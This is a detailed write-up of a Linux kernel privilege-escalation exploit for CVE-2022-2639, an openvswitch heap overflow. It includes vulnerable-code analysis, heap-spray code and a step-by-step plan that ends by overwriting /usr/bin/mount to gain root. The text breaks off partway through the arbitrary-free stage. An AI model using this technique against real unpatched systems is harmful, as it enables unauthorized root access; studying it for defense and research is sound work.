[kernel exploit] CVE-2022-2639: exploiting a kmalloc-0x10000 heap overflow in the openvswitch module (arbitrary file write via pipe_buffer)

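Affected versions: Linux v3.13-rc1 through v5.18-rc4. Fixed in 5.17.5; 5.17.4 is still vulnerable. This post follows the pipe-based arbitrary file write technique proposed by veritas501.

Test version: Linux-5.17.4. The exploit and test environment can be downloaded from https://github.com/bsauce/kernel-exploit-factory

Build options:

CONFIG_OPENVSWITCH=y (the vulnerable module)

// Dependencies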
CONFIG_INET=y
# CONFIG_NF_CONNTRACK is not set
CONFIG_LIBCRC32C=y
CONFIG_MPLS=y
CONFIG_NET_MPLS_GSO=y
CONFIG_DST_CACHE=y
CONFIG_NET_NSH=y
// net/openvswitch/Kconfig
config OPENVSWITCH
	tristate "Open vSwitch"
	depends on INET
	depends on !NF_CONNTRACK || \
		   (NF_CONNTRACK && ((!NF_DEFRAG_IPV6 || NF_DEFRAG_IPV6) && \
				     (!NF_NAT || NF_NAT) && \
				     (!NETFILTER_CONNCOUNT || NETFILTER_CONNCOUNT)))
	select LIBCRC32C
	select MPLS
	select NET_MPLS_GSO
	select DST_CACHE
	select NET_NSH
// Press h on the corresponding menu item to show its dependencies and configuration options
  ┌────────────────────────────────────────────────────── Open vSwitch ──────────────────────────────────────────────────────┐
  │ Open vSwitch is a multilayer Ethernet switch targeted at virtualized                                                     │  
  │ environments.  In addition to supporting a variety of features                                                           │  
  │ expected in a traditional hardware switch, it enables fine-grained                                                       │  
  │ programmatic extension and flow-based control of the network.  This                                                      │  
  │ control is useful in a wide variety of applications but is                                                               │  
  │ particularly important in multi-server virtualization deployments,                                                       │  
  │ which are often characterized by highly dynamic endpoints and the                                                        │  
  │ need to maintain logical abstractions for multiple tenants.                                                              │  
  │                                                                                                                          │  
  │ The Open vSwitch datapath provides an in-kernel fast path for packet                                                     │  
  │ forwarding.  It is complemented by a userspace daemon, ovs-vswitchd,                                                     │  
  │ which is able to accept configuration from a variety of sources and                                                      │  
  │ translate it into packet processing rules.                                                                               │  
  │                                                                                                                          │  
  │ See http://openvswitch.org for more information and userspace                                                            │  
  │ utilities.                                                                                                               │  
  │                                                                                                                          │  
  │ To compile this code as a module, choose M here: the module will be                                                      │  
  │ called openvswitch.                                                                                                      │  
  │                                                                                                                          │  
  │ If unsure, say N.                                                                                                        │  
  │                                                                                                                          │  
  │ Symbol: OPENVSWITCH [=m]                                                                                                 │  
  │ Type  : tristate                                                                                                         │  
  │ Defined at net/openvswitch/Kconfig:6                                                                                     │  
  │   Prompt: Open vSwitch                                                                                                   │  
  │   Depends on: NET [=y] && INET [=y] && (!NF_CONNTRACK [=m] || NF_CONNTRACK [=m] && (!NF_DEFRAG_IPV6 [=m] || \            │  
  │ NF_DEFRAG_IPV6 [=m]) && (!NF_NAT [=m] || NF_NAT [=m]) && (!NETFILTER_CONNCOUNT [=m] || NETFILTER_CONNCOUNT [=m]))        │  
  │   Location:                                                                                                              │  
  │     Main menu                                                                                                            │  
  │       -> Networking support (NET [=y])                                                                                   │  
  │         -> Networking options                                                                                            │  
  │ Selects: LIBCRC32C [=y] && MPLS [=y] && NET_MPLS_GSO [=y] && DST_CACHE [=y] && NET_NSH [=y]                              │  
  │                                                                                             

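CONFIG_BINFMT_MISC=y (otherwise the VM reports an error at boot)

CONFIG_USER_NS=y

When building, change CONFIG_E1000 and CONFIG_E1000E in .config to =y (reference).

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.17.4.tar.xz
$ tar -xvf linux-5.17.4.tar.xz
# KASAN: in make menuconfig, enable "Kernel hacking" -> "Memory Debugging" -> "KASan: runtime memory debugger".
$ make -j32
$ make all
$ make modules
# The compiled bzImage is at arch/x86/boot/bzImage.

Vulnerability description: in the openvswitch kernel module, reserve_sfa_size() contains an integer overflow that leads to an out-of-bounds heap write past a kmalloc-0x10000 object. Exploiting it requires page spraying to build a cross-cache overflow.

Patch: patch; commit that introduced the vulnerability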

@@ -2465,7 +2465,7 @@ static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);

	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
-		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
+		if ((next_offset + req_size) > MAX_ACTIONS_BUFSIZE) {
			OVS_NLERR(log, "Flow action size exceeds max %u",
				  MAX_ACTIONS_BUFSIZE);
			return ERR_PTR(-EMSGSIZE);

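Mitigations: KASLR/SMEP/SMAP/KPTI

Exploit summary: this exploit uses the pipe-primitive to tamper with an arbitrary file, so it does not need to bypass KASLR/SMEP/SMAP/KPTI and works across kernel versions without per-version adaptation. It first creates pipes and splices the read-only file /usr/bin/mount into them, then heap-sprays to forge pipe_buffer->flags = PIPE_BUF_FLAG_CAN_MERGE. After that, a suid shell can be written into /usr/bin/mount and executed to gain root.

The OOB write is triggered twice. The first overflow corrupts msg_msg->m_ts so that an out-of-bounds read discloses the adjacent msg_msg->m_list.next, leaking a kmalloc-1024 heap address. The second overflow corrupts msg_msg->m_list.next so that it points at the leaked kmalloc-1024 address, which yields an arbitrary free.

Note: back up /usr/bin/mount manually before running the exploit and restore it afterwards. Pick the target file according to your environment; in my test environment, for example, the target is /bin/mount.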

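(1) Initialization: pin the process to CPU 0; set up namespaces; create 2*0x400 msg queues, stored in two arrays msqid_1 / msqid_2; create 4 sock_pairs for spraying sk_buff->data;
(2) Leak a kmalloc-1024 heap address
- (2-1) Heap feng shui: spray RX_RING buffers to exhaust all free blocks between 0x1000 and 0x10000;
- (2-2) Heap layout: spray 32 blocks of size 0x10000 and free the odd-indexed ones;
- (2-3) Spray msg_msg: through array msqid_1, spray 0x400 msg_msg + msg_msgseg pairs (0x1000 + 0x400 bytes) that occupy the odd-indexed 0x10000 blocks, so that some 0x1000 msg_msg sits at the start of a 0x10000 block;
- (2-4) Free the even-indexed 0x10000 blocks;
- (2-5) Place the vulnerable object: trigger the bug so that the vulnerable object takes an even-indexed 0x10000 block and overflows into the adjacent msg_msg, setting msg_msg->m_ts = 0x1400 + 0x400;
- (2-6) Find the corrupted msg_msg (the one whose readable length is 0x1800) and record its queue as list1_corrupted_msqid;
- (2-7) Free every msg_msg + msg_msgseg in array msqid_1 except list1_corrupted_msqid;
- (2-8) Through array msqid_2, spray 0x400 * 16 msg_msg in kmalloc-0x400 (so that the msg_msg->m_list of every kmalloc-1024 msg_msg points at another kmalloc-1024 object);
- (2-9) Read out of bounds through list1_corrupted_msqid to leak the adjacent msg_msg->m_list.next / prev, i.e. a kmalloc-1024 address (recorded as list2_uaf_msg_addr); the queue of the leaked msg_msg is recorded as list2_leak_msqid;
- (2-10) Free every msg_msg in array msqid_2 except list2_leak_msqid;
(3) Forge pipe_buffer->flags and overwrite /usr/bin/mount with shellcode (/bin/mount in my test environment)
- (3-1) Heap feng shui: spray RX_RING buffers to exhaust all free blocks between 0x1000 and 0x10000;
- (3-2) Heap layout: spray 32 blocks of size 0x10000 and free the odd-indexed ones;
- (3-3) Spray msg_msg: through array msqid_1, spray 0x400 msg_msg + msg_msgseg pairs (0x1000 + 0x400 bytes) that occupy the odd-indexed 0x10000 blocks, so that some 0x1000 msg_msg sits at the start of a 0x10000 block;
- (3-4) Free the even-indexed 0x10000 blocks;
- (3-5) Place the vulnerable object: trigger the bug so that the vulnerable object takes an even-indexed 0x10000 block and overflows into the adjacent msg_msg, making the corrupted msg_msg->m_list.next point at the kmalloc-1024 address leaked via list2_leak_msqid (i.e. list2_uaf_msg_addr);
- (3-6) First free of the UAF msg_msg: free the leaked UAF msg_msg (kmalloc-1024) through list2_leak_msqid;
- (3-7) Spray 4*32 sk_buff->data to reclaim the UAF msg_msg in kmalloc-1024, forging msg_msg->m_list.next = msg_msg->m_list.prev = list2_uaf_msg_addr and msg_msg->m_type = MTYPE_FAKE;
- (3-8) Second free of the UAF msg_msg: through msqid_1, free the UAF msg_msg with msg_msg->m_type = MTYPE_FAKE at list2_uaf_msg_addr (kmalloc-1024);
- (3-9) Spray 0x100 pipe_buffer objects to reclaim the UAF msg_msg, each spliced to /bin/mount;
- (3-10) Read (and thereby free) all sk_buff->data; use the content read back (pipe_buffer->len) to identify the index of the overlapping pipe_buffer (recorded as uaf_pipe_idx);
- (3-11) Spray 4*32 sk_buff->data to forge pipe_buffer->flags = PIPE_BUF_FLAG_CAN_MERGE, leaving the other members unchanged;
- (3-12) Overwrite /bin/mount through the pipe with index uaf_pipe_idx;
(4) Execute /bin/mount to escalate privileges.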

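1. Vulnerability analysis

Call path to the bug: __ovs_nla_copy_actions() -> copy_action() -> reserve_sfa_size()

1-1. Code analysis

__ovs_nla_copy_actions(): handles each incoming action according to its type (some are copied directly, others are processed first and stored in sw_flow_actions **sfa), then calls copy_action() to copy the action and its struct nlattr data.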

static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
				  const struct sw_flow_key *key,
				  struct sw_flow_actions **sfa,
				  __be16 eth_type, __be16 vlan_tci,
				  u32 mpls_label_count, bool log)
{
	u8 mac_proto = ovs_key_mac_proto(key);
	const struct nlattr *a;
	int rem, err;

	nla_for_each_nested(a, attr, rem) {
		/* Expected argument lengths, (u32)-1 for variable length. */
		static const u32 action_lens[OVS_ACTION_ATTR_MAX + 1] = {
			[OVS_ACTION_ATTR_OUTPUT] = sizeof(u32),
			[OVS_ACTION_ATTR_RECIRC] = sizeof(u32),
			[OVS_ACTION_ATTR_USERSPACE] = (u32)-1,
			[OVS_ACTION_ATTR_PUSH_MPLS] = sizeof(struct ovs_action_push_mpls),
			[OVS_ACTION_ATTR_POP_MPLS] = sizeof(__be16),
			[OVS_ACTION_ATTR_PUSH_VLAN] = sizeof(struct ovs_action_push_vlan),
			[OVS_ACTION_ATTR_POP_VLAN] = 0,
			[OVS_ACTION_ATTR_SET] = (u32)-1,
			[OVS_ACTION_ATTR_SET_MASKED] = (u32)-1,
			[OVS_ACTION_ATTR_SAMPLE] = (u32)-1,
			[OVS_ACTION_ATTR_HASH] = sizeof(struct ovs_action_hash),
			[OVS_ACTION_ATTR_CT] = (u32)-1,
			[OVS_ACTION_ATTR_CT_CLEAR] = 0,
			[OVS_ACTION_ATTR_TRUNC] = sizeof(struct ovs_action_trunc),
			[OVS_ACTION_ATTR_PUSH_ETH] = sizeof(struct ovs_action_push_eth),
			[OVS_ACTION_ATTR_POP_ETH] = 0,
			[OVS_ACTION_ATTR_PUSH_NSH] = (u32)-1,
			[OVS_ACTION_ATTR_POP_NSH] = 0,
			[OVS_ACTION_ATTR_METER] = sizeof(u32),
			[OVS_ACTION_ATTR_CLONE] = (u32)-1,
			[OVS_ACTION_ATTR_CHECK_PKT_LEN] = (u32)-1,
			[OVS_ACTION_ATTR_ADD_MPLS] = sizeof(struct ovs_action_add_mpls),
			[OVS_ACTION_ATTR_DEC_TTL] = (u32)-1,
		};
		const struct ovs_action_push_vlan *vlan;
		int type = nla_type(a);
		bool skip_copy;

		if (type > OVS_ACTION_ATTR_MAX ||
		    (action_lens[type] != nla_len(a) &&
		     action_lens[type] != (u32)-1))
			return -EINVAL;

		skip_copy = false;
		switch (type) {
		case OVS_ACTION_ATTR_UNSPEC:
			return -EINVAL;
		...
		case OVS_ACTION_ATTR_DEC_TTL:
			err = validate_and_copy_dec_ttl(net, a, key, sfa,
							eth_type, vlan_tci,
							mpls_label_count, log);
			if (err)
				return err;
			skip_copy = true;
			break;

		default:
			OVS_NLERR(log, "Unknown Action type %d", type);
			return -EINVAL;
		}
		if (!skip_copy) {
			err = copy_action(a, sfa, log);			// [1] copy the action data (for types that did not set skip_copy)
			if (err)
				return err;
		}
	}
	...
}

copy_action()

static int copy_action(const struct nlattr *from,
		       struct sw_flow_actions **sfa, bool log)
{
	int totlen = NLA_ALIGN(from->nla_len);
	struct nlattr *to;

	to = reserve_sfa_size(sfa, from->nla_len, log);	// [2] vulnerable function
	if (IS_ERR(to))
		return PTR_ERR(to);

	memcpy(to, from, totlen);						// [3] overflow point! This copies the data that follows the already-stored actions
	return 0;
}

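reserve_sfa_size(): the integer overflow occurs at [2-1]. next_offset is a signed int and req_size is an unsigned size_t. Once next_offset exceeds MAX_ACTIONS_BUFSIZE, the subtraction MAX_ACTIONS_BUFSIZE - next_offset is negative; for the comparison with req_size it is converted to a huge unsigned value, so the "<" test is false and the size check is bypassed.

Allocation: the function then allocates a buffer and copies the actions and nlattr data into it. The buffer holds three parts: the struct sw_flow_actions header, the actions, and the remaining nlattr data.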

static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
				       int attr_len, bool log)
{

	struct sw_flow_actions *acts;
	int new_acts_size;
	size_t req_size = NLA_ALIGN(attr_len);							// req_size = NLA_ALIGN(nlattr->nla_len)
	int next_offset = offsetof(struct sw_flow_actions, actions) +	// next_offset = (header size of *sfa + (*sfa)->actions_len)
					(*sfa)->actions_len;							// offsetof(): byte offset of a member from the start of its struct

	if (req_size <= (ksize(*sfa) - next_offset))
		goto out;

	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);

	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {	// [2-1] next_offset is signed, req_size is unsigned. If next_offset > MAX_ACTIONS_BUFSIZE, the left side is negative and is converted to a huge unsigned value, bypassing this check. MAX_ACTIONS_BUFSIZE = 0x8000
			OVS_NLERR(log, "Flow action size exceeds max %u",
				  MAX_ACTIONS_BUFSIZE);
			return ERR_PTR(-EMSGSIZE);
		}
		new_acts_size = MAX_ACTIONS_BUFSIZE;					// [2-2] new_acts_size = 0x8000
	}

	acts = nla_alloc_flow_actions(new_acts_size);				// [2-3] allocate a new buffer (ends up in a 0x10000-sized block)
	if (IS_ERR(acts))
		return (void *)acts;

	memcpy(acts->actions, (*sfa)->actions, (*sfa)->actions_len);// [2-4] copy the existing action data first
	acts->actions_len = (*sfa)->actions_len;
	acts->orig_len = (*sfa)->orig_len;
	kfree(*sfa);
	*sfa = acts;

out:
	(*sfa)->actions_len += req_size;
	return  (struct nlattr *) ((unsigned char *)(*sfa) + next_offset);	// [2-5] return the address buffer + next_offset
}

static struct sw_flow_actions *nla_alloc_flow_actions(int size)
{
	struct sw_flow_actions *sfa;

	WARN_ON_ONCE(size > MAX_ACTIONS_BUFSIZE);

	sfa = kmalloc(sizeof(*sfa) + size, GFP_KERNEL);				// [2-3-1] requests 0x8000+0x20 bytes (the sw_flow_actions header comes first); after rounding up, this lands in a 0x10000 block
	if (!sfa)
		return ERR_PTR(-ENOMEM);

	sfa->actions_len = 0;
	return sfa;
}
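
To make the bypass at [2-1] concrete, the sketch below reproduces the two forms of the check in user space. The helper names rejects_before_patch() and rejects_after_patch() are invented for this illustration, and the types are assumed to match the kernel's (int next_offset, size_t req_size) on a 64-bit build. It only models the comparison and is not kernel code.

```c
#include <stdbool.h>
#include <stddef.h>

#define MAX_ACTIONS_BUFSIZE (32 * 1024)	/* 0x8000, as in the listing above */

/* Pre-patch form of the check at [2-1] (hypothetical helper name).
 * The int result of the subtraction is converted to size_t for the
 * comparison, so a negative difference becomes a huge unsigned value.
 * Returns true when the request would be rejected with -EMSGSIZE. */
static bool rejects_before_patch(int next_offset, size_t req_size)
{
	return (MAX_ACTIONS_BUFSIZE - next_offset) < req_size;
}

/* Patched form: the sum is evaluated as size_t and compared directly,
 * so no negative intermediate value can appear. */
static bool rejects_after_patch(int next_offset, size_t req_size)
{
	return (next_offset + req_size) > MAX_ACTIONS_BUFSIZE;
}
```

With next_offset = 0x9000 and req_size = 0x20, the pre-patch form does not reject the request while the patched form does. For offsets below 0x8000 the two forms agree.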

1-2. Feasibility of the overflow

Packet format: struct nlmsghdr -> struct genlmsghdr -> struct nlattr. openvswitch communicates over netlink, so a message is structured in these three layers.

/*
 *  <------- NLA_HDRLEN ------> <-- NLA_ALIGN(payload)-->
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 * |        Header       | Pad |     Payload       | Pad |
 * |   (struct nlattr)   | ing |                   | ing |
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 *  <-------------- nlattr->nla_len -------------->
 */

struct nlattr {		// attributes are padded to a 4-byte boundary
	__u16           nla_len;
	__u16           nla_type;
};
#define NLA_ALIGNTO		4
#define NLA_ALIGN(len)		(((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))
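
As a small worked example of the macro above, the sketch below computes the padded length of an attribute from its 16-bit nla_len. The helper name nla_padded_len() is invented for this illustration; the two macros are copied from the listing.

```c
#include <stdint.h>

#define NLA_ALIGNTO    4
#define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))

/* Bytes one attribute occupies in a message once it is padded to a
 * 4-byte boundary (hypothetical helper). nla_len is a __u16 in
 * struct nlattr, so the input can never exceed 0xffff. */
static unsigned int nla_padded_len(uint16_t nla_len)
{
	return NLA_ALIGN((unsigned int)nla_len);
}
```

An nla_len of 5 pads to 8, 0x14 stays 0x14, and the largest possible value 0xffff pads to exactly 0x10000. A single attribute therefore never exceeds the size of the heap block.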

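Overflow length problem: the copy at the overflow point ([3]) has length nlattr->nla_len, but this field is only 2 bytes wide, so it is at most 0xffff, while the heap block is 0x10000 bytes. At first glance there is no way to overflow. The copy at [2-4] moves the existing sw_flow_actions contents first, but that data is itself derived from struct nlattr input (a struct nlattr converted into sw_flow_actions form), so it does not seem to overflow either.

1-3. Padding the action data to increase the overflow length

Approach: look again at the top-level __ovs_nla_copy_actions(). Normally the struct nlattr we pass in and the action that gets copied have the same length, and copy_action() performs the copy (skip_copy defaults to false; the call is at [1]). Some action types, however, never call copy_action(). They process the incoming nlattr themselves and store the resulting action in sw_flow_actions *sfa. Later, another nlattr type triggers copy_action(), and the accumulated sw_flow_actions *sfa content is copied into the vulnerable object, which is the first copy at [2-4]. For some types, the action produced from the nlattr is larger than the nlattr itself, so the second copy can overflow, with the total copied length exceeding 0x10000.

Case 1: OVS_ACTION_ATTR_CT calls ovs_ct_copy_action() to copy the action itself. At [a], parse_ct() turns an 8-byte nlattr into a 0xA0-byte ovs_conntrack_info; at [b], ovs_nla_add_action() stores the action in sw_flow_actions **sfa. So 8 bytes of input are amplified to 0xA0 bytes. Passing 500 nlattr of type OVS_ACTION_ATTR_CT raises the next_offset value analyzed above from 500*8 = 0xFA0 to 500*0xA0 = 0x13880, which makes the copy at [3] overflow.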

		case OVS_ACTION_ATTR_CT:
			err = ovs_ct_copy_action(net, a, key, sfa, log);
			if (err)
				return err;
			skip_copy = true;
			break;

int ovs_ct_copy_action(struct net *net, const struct nlattr *attr,
		       const struct sw_flow_key *key,
		       struct sw_flow_actions **sfa,  bool log)
{
	struct ovs_conntrack_info ct_info;
	const char *helper = NULL;
	u16 family;
	int err;

	family = key_to_nfproto(key);
	if (family == NFPROTO_UNSPEC) {
		OVS_NLERR(log, "ct family unspecified");
		return -EINVAL;
	}

	memset(&ct_info, 0, sizeof(ct_info));
	ct_info.family = family;

	nf_ct_zone_init(&ct_info.zone, NF_CT_DEFAULT_ZONE_ID,
			NF_CT_DEFAULT_ZONE_DIR, 0);

	err = parse_ct(attr, &ct_info, &helper, log);					// [a] parse the nlattr into an ovs_conntrack_info structure
	...
	err = ovs_nla_add_action(sfa, OVS_ACTION_ATTR_CT, &ct_info,		// [b] 
				 sizeof(ct_info), log);
	...
}

Problem: the layout of ovs_conntrack_info differs between kernel versions, so its size is not fixed. We therefore turn to OVS_ACTION_ATTR_SET actions.

Case 2: for OVS_ACTION_ATTR_SET actions, the action nlattr is handled in validate_set().

		case OVS_ACTION_ATTR_SET:
			err = validate_set(a, key, sfa,
					   &skip_copy, mac_proto, eth_type,
					   false, log);
			if (err)
				return err;
			break;

static int validate_set(const struct nlattr *a,
			const struct sw_flow_key *flow_key,
			struct sw_flow_actions **sfa, bool *skip_copy,
			u8 mac_proto, __be16 eth_type, bool masked, bool log)
{
	const struct nlattr *ovs_key = nla_data(a);					// [a] fetch the nested inner nlattr
	int key_type = nla_type(ovs_key);
	size_t key_len;

	/* There can be only one key in a action */
	if (nla_total_size(nla_len(ovs_key)) != nla_len(a))
		return -EINVAL;

	key_len = nla_len(ovs_key);									// [b] key_len = data length
	if (masked)														// OVS_ACTION_ATTR_SET never sets masked
		key_len /= 2;

	if (key_type > OVS_KEY_ATTR_MAX ||
	    !check_attr_len(key_len, ovs_key_lens[key_type].len))	// [c] check that key_len matches the structure size for the type (OVS_KEY_ATTR_ETHERNET)
		return -EINVAL;

	if (masked && !validate_masked(nla_data(ovs_key), key_len))
		return -EINVAL;

	switch (key_type) {
	...
	case OVS_KEY_ATTR_ETHERNET:
		if (mac_proto != MAC_PROTO_ETHERNET)					// [d] the check for key_type == OVS_KEY_ATTR_ETHERNET is trivial
			return -EINVAL;
		break;
    ...
	}

	/* Convert non-masked non-tunnel set actions to masked set actions. */
	if (!masked && key_type != OVS_KEY_ATTR_TUNNEL) {
		int start, len = key_len * 2;							// [e] !!! len is twice key_len
		struct nlattr *at;

		*skip_copy = true;										// [f] set skip_copy so that the caller does not call copy_action()

		start = add_nested_action_start(sfa,
						OVS_ACTION_ATTR_SET_TO_MASKED,
						log);
		if (start < 0)
			return start;

		at = __add_action(sfa, key_type, NULL, len, log);		// [g] call __add_action() with len = 2*key_len; the data is stored in sfa first, and a later nlattr type triggers `copy_action()`, which copies `sw_flow_actions **sfa` into the vulnerable object
		if (IS_ERR(at))
			return PTR_ERR(at);

		memcpy(nla_data(at), nla_data(ovs_key), key_len); /* Key. */
		memset(nla_data(at) + key_len, 0xff, key_len);    /* Mask. */
		/* Clear non-writeable bits from otherwise writeable fields. */
		if (key_type == OVS_KEY_ATTR_IPV6) {
			struct ovs_key_ipv6 *mask = nla_data(at) + key_len;

			mask->ipv6_label &= htonl(0x000FFFFF);
		}
		add_nested_action_end(*sfa, start);
	}

	return 0;
}

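Suppose the nested nlattr has type OVS_KEY_ATTR_ETHERNET (structure ovs_key_ethernet). It must pass the key_len check at [c], so key_len = sizeof(struct ovs_key_ethernet) == 0x0C.

At [e], len = 2*key_len == 0x18, so the stored action is twice the original length. Counting the two nested headers needed to add this nlattr, 0x04 + 0x04 + 0x0C == 0x14 bytes of input advance the buffer pointer described at the beginning by 0x04 + 0x04 + 0x0C * 2 == 0x20 bytes. The amplification factor is smaller than with sizeof(struct ovs_conntrack_info), but it is still enough to overflow, and it is more stable because the structure size does not have to be computed per kernel version.

The overflow itself still happens at [3] in copy_action(), i.e. during the second copy, when the remaining nlattr is copied.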

[OVS_KEY_ATTR_ETHERNET]	 = { .len = sizeof(struct ovs_key_ethernet) },

#define ETH_ALEN	6		/* Octets in one ethernet addr	 */
struct ovs_key_ethernet {
	__u8	 eth_src[ETH_ALEN];
	__u8	 eth_dst[ETH_ALEN];
};
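
The per-attribute arithmetic above can be checked with a few lines of C. This is only a sketch of the bookkeeping: the helper names set_input_bytes() and set_stored_bytes() are invented here, NLA_HDRLEN is taken to be 4 (the aligned size of struct nlattr), and the struct is redeclared with fixed-width types so the block compiles in user space.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ETH_ALEN   6
#define NLA_HDRLEN 4	/* aligned sizeof(struct nlattr) */

struct ovs_key_ethernet {
	uint8_t eth_src[ETH_ALEN];
	uint8_t eth_dst[ETH_ALEN];
};

/* The check at [c] only passes when key_len equals this size. */
static_assert(sizeof(struct ovs_key_ethernet) == 0x0C, "key_len must be 0x0C");

/* Bytes supplied by user space for one SET action wrapping one key:
 * outer header + inner header + key (hypothetical helper). */
static size_t set_input_bytes(size_t key_len)
{
	return NLA_HDRLEN + NLA_HDRLEN + key_len;
}

/* Bytes the same action occupies in sfa after validate_set() has
 * appended the all-ones mask, doubling the payload (hypothetical helper). */
static size_t set_stored_bytes(size_t key_len)
{
	return NLA_HDRLEN + NLA_HDRLEN + 2 * key_len;
}
```

For key_len = 0x0C the two helpers return 0x14 and 0x20, the numbers quoted in the text, which corresponds to an amplification factor of 1.6.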

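2. Exploitation

Exploit idea: build a cross-cache overflow that corrupts a msg_msg, overflowing from the vulnerable object in kmalloc-0x10000 into a msg_msg in kmalloc-0x1000.

2-1. Page spraying

Page spraying: for background on page spraying, see CVE-2022-27666. The spray uses rx_ring buffer objects; the call path is packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec() -> alloc_one_pg_vec_page(). The order of the allocated pages is determined by tpacket_req->tp_block_size. Example spray code: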

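#include <arpa/inet.h>        // htons()
#include <linux/if_packet.h>
#include <string.h>           // memset()
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <unistd.h>           // close()
// die() is assumed to be the exploit's own error helper (print the message and exit).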

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (rv < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        die("socket(AF_PACKET): %m");
    }

    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
                               sizeof_priv, timeout);

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0) {
        die("bind(AF_PACKET): %m");
    }

    return s;
}

int pagealloc_pad(int count, int size) {
    return packet_socket_setup(size, 2048, count, 0, 100);
}

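int fd;

fd = pagealloc_pad(1, 0x10000);   // allocate one 0x10000 chunk
close(fd);                        // free the chunk

fd = pagealloc_pad(100, 0x1000);  // allocate 100 chunks of 0x1000
close(fd);                        // free all 100 chunks at once

2-2. Heap layout

Heap feng shui: first exhaust the free blocks on the 0x1000 ~ 0x10000 freelists, so that the vulnerable object and a msg_msg can be placed next to each other.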

logd("do heap fengshui to reduce noise ...");
pagealloc_pad(1000, 0x1000);
pagealloc_pad(500, 0x2000);
pagealloc_pad(200, 0x4000);
pagealloc_pad(200, 0x8000);
pagealloc_pad(100, 0x10000);

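Making the vulnerable object adjacent to a msg_msg: spray 32 blocks of size 0x10000. The allocator then takes 0x20000 (order 5) pages and splits each into two 0x10000 (order 4) blocks, which are very likely adjacent. Then free the odd-indexed 0x10000 blocks.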

#define fengshui_skfd_cnt (0x20)

int fengshui_skfd[fengshui_skfd_cnt];
for (int i = 0; i < fengshui_skfd_cnt; i++) {
	fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
}
for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
	close(fengshui_skfd[i]);
	fengshui_skfd[i] = -1;
}
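
The relation between block sizes and page orders used above can be verified with a short helper. This is a sketch that assumes 4 KiB pages; order_for_size() is a name invented for this illustration and does not come from the exploit.

```c
#include <stddef.h>

#define PAGE_SIZE_4K 0x1000u	/* assumption: 4 KiB pages (x86-64 default) */

/* Smallest buddy-allocator order whose block (PAGE_SIZE << order)
 * is large enough to hold `size` bytes (hypothetical helper). */
static unsigned int order_for_size(size_t size)
{
	unsigned int order = 0;

	while (((size_t)PAGE_SIZE_4K << order) < size)
		order++;
	return order;
}
```

A 0x10000 block is order 4 and a 0x20000 block is order 5, matching the text. The 0x8000 + 0x20 byte request made by nla_alloc_flow_actions() also maps to order 4, which is why the vulnerable object occupies a 0x10000 block.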

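Spray pairs of one 0x1000 msg_msg and one 0x400 msg_msgseg; one of them very likely ends up adjacent to a vulnerable object.

Free the other half of the rx_ring buffers, trigger the bug so that the vulnerable object is allocated, and overflow into the adjacent msg_msg to corrupt its msg_msg->m_ts member.

[Figure: 1-vul_state]

2-3. Leaking a heap address

Steps:

(1) An out-of-bounds read through the msg_msg discloses a msg_msgseg that belongs to another msg queue (the overwritten msg_msg is called the corrupted msg and the msg_msgseg read out of bounds is called the leaked msg; both can be identified by the data they were pre-filled with);
(2) Free the leaked msg, then create a new set of msg queues and spray 16 msg_msg of size 0x400 into each queue to reclaim the leaked msg;
(3) Read out of bounds through the corrupted msg to leak some msg_msg's msg_msg->m_list.next pointer, i.e. the address of a kmalloc-0x400 block. Call it the leaked kmalloc-1024; it is used later to build the UAF.

[Figure: 2-leak_heap]

2-4. Arbitrary free

Arbitrary free: rebuild the heap layout and trigger the bug again to corrupt the adjacent msg_msg's msg_msg->m_list.next so that it points at the leaked kmalloc-1024. The leaked kmalloc-1024 can then be freed, which gives a UAF.

[Figure: 3-arb-free]

Heap layout:

(1) First free the leaked kmalloc-1024 through the regular 0x400 msg queue;
(2) Spray sk_buff->data to reclaim the leaked kmalloc-1024 and forge a valid msg_msg structure in it (note: this sk_buff->data belongs to UDP sockets, its size ranges from 0x180 to 0x1000, the front part is user-controlled data, the trailing 0x140 bytes are struct skb_shared_info, and the allocation flag is GFP_KERNEL_ACCOUNT);
(3) Free the leaked kmalloc-1024 a second time through the corrupted msg queue, which gives a UAF on sk_buff->data;
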